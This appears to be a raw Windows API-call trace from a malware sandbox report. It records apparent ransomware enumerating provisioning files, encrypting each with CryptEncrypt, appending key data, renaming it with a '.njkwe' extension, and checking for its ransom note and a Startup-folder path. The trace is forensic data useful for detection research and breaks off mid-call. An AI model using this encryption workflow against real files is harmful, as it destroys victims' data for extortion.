[0077.882] GetProcessHeap () returned 0xbe0000 [0077.882] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.882] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0077.890] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.890] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x280, lpOverlapped=0x0) returned 1 [0077.890] GetProcessHeap () returned 0xbe0000 [0077.890] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.890] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.890] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.890] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.890] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.891] CloseHandle (hObject=0x43c) returned 1 [0077.891] GetProcessHeap () returned 0xbe0000 [0077.891] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.891] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0077.891] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\27__connections_cellular_a1 (austria)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\27__Connections_Cellular_A1 (Austria)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\27__connections_cellular_a1 (austria)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.891] GetProcessHeap () returned 0xbe0000 [0077.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.892] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aa0698, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aa0698, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aa0698, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", cAlternateFileName="280__C~1.PRO")) returned 1 [0077.892] lstrcmpiW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.892] lstrcmpiW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.892] lstrcmpiW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.892] lstrcmpiW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.892] lstrcmpiW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.892] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml") returned 165 [0077.892] StrStrIW (lpFirst="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.892] lstrcmpW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.892] lstrcmpW (lpString1="280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.892] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\280__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.892] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\280__connections_cellular_kpn-hi (netherlands)_i12$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.892] GetTickCount () returned 0x1153ce6 [0077.892] GetTickCount () returned 0x1153ce6 [0077.892] GetTickCount () returned 0x1153ce6 [0077.892] GetTickCount () returned 0x1153ce6 [0077.892] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.892] GetProcessHeap () returned 0xbe0000 [0077.892] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.892] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e8, lpOverlapped=0x0) returned 1 [0077.898] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.898] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e8, lpOverlapped=0x0) returned 1 [0077.898] GetProcessHeap () returned 0xbe0000 [0077.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.898] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.898] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.898] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.898] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.898] CloseHandle (hObject=0x43c) returned 1 [0077.898] GetProcessHeap () returned 0xbe0000 [0077.898] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.898] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\280__connections_cellular_kpn-hi (netherlands)_i12$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\280__Connections_Cellular_KPN-Hi (Netherlands)_i12$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\280__connections_cellular_kpn-hi (netherlands)_i12$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.903] GetProcessHeap () returned 0xbe0000 [0077.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.903] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aa0698, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aa0698, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aa0698, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", cAlternateFileName="281__C~1.PRO")) returned 1 [0077.965] lstrcmpiW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.965] lstrcmpiW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.965] lstrcmpiW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.965] lstrcmpiW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.965] lstrcmpiW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.965] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml") returned 165 [0077.965] StrStrIW (lpFirst="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.966] lstrcmpW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.966] lstrcmpW (lpString1="281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.966] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\281__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.966] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\281__connections_cellular_kpn-hi (netherlands)_i13$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.967] GetTickCount () returned 0x1153d34 [0077.967] GetTickCount () returned 0x1153d34 [0077.967] GetTickCount () returned 0x1153d34 [0077.967] GetTickCount () returned 0x1153d34 [0077.967] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.967] GetProcessHeap () returned 0xbe0000 [0077.967] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.967] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.971] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.971] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.972] GetProcessHeap () returned 0xbe0000 [0077.972] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.972] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.972] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.972] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.972] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.972] CloseHandle (hObject=0x43c) returned 1 [0077.972] GetProcessHeap () returned 0xbe0000 [0077.972] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.972] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\281__connections_cellular_kpn-hi (netherlands)_i13$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\281__Connections_Cellular_KPN-Hi (Netherlands)_i13$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\281__connections_cellular_kpn-hi (netherlands)_i13$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.973] GetProcessHeap () returned 0xbe0000 [0077.973] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.973] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aa0698, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aa0698, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aa0698, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", cAlternateFileName="282__C~1.PRO")) returned 1 [0077.973] lstrcmpiW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.973] lstrcmpiW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.974] lstrcmpiW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.974] lstrcmpiW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.974] lstrcmpiW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.974] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml") returned 165 [0077.974] StrStrIW (lpFirst="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.974] lstrcmpW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.974] lstrcmpW (lpString1="282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.974] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\282__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.974] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\282__connections_cellular_kpn-hi (netherlands)_i14$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.974] GetTickCount () returned 0x1153d34 [0077.974] GetTickCount () returned 0x1153d34 [0077.974] GetTickCount () returned 0x1153d34 [0077.974] GetTickCount () returned 0x1153d34 [0077.974] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.974] GetProcessHeap () returned 0xbe0000 [0077.974] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.974] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0077.980] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.980] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2dc, lpOverlapped=0x0) returned 1 [0077.980] GetProcessHeap () returned 0xbe0000 [0077.980] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.980] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.980] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.980] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.980] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.980] CloseHandle (hObject=0x43c) returned 1 [0077.981] GetProcessHeap () returned 0xbe0000 [0077.981] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.981] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0077.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\282__connections_cellular_kpn-hi (netherlands)_i14$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\282__Connections_Cellular_KPN-Hi (Netherlands)_i14$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\282__connections_cellular_kpn-hi (netherlands)_i14$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.982] GetProcessHeap () returned 0xbe0000 [0077.982] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.982] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90aa0698, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90aa0698, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90aa0698, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2df, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", cAlternateFileName="283__C~1.PRO")) returned 1 [0077.982] lstrcmpiW (lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.982] lstrcmpiW (lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.982] lstrcmpiW (lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.982] lstrcmpiW (lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.982] lstrcmpiW (lpString1="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.982] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml") returned 165 [0077.982] StrStrIW (lpFirst="283__Connections_Cellular_KPN-Hi (Netherlands)_i15$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.982] lstrcmpW 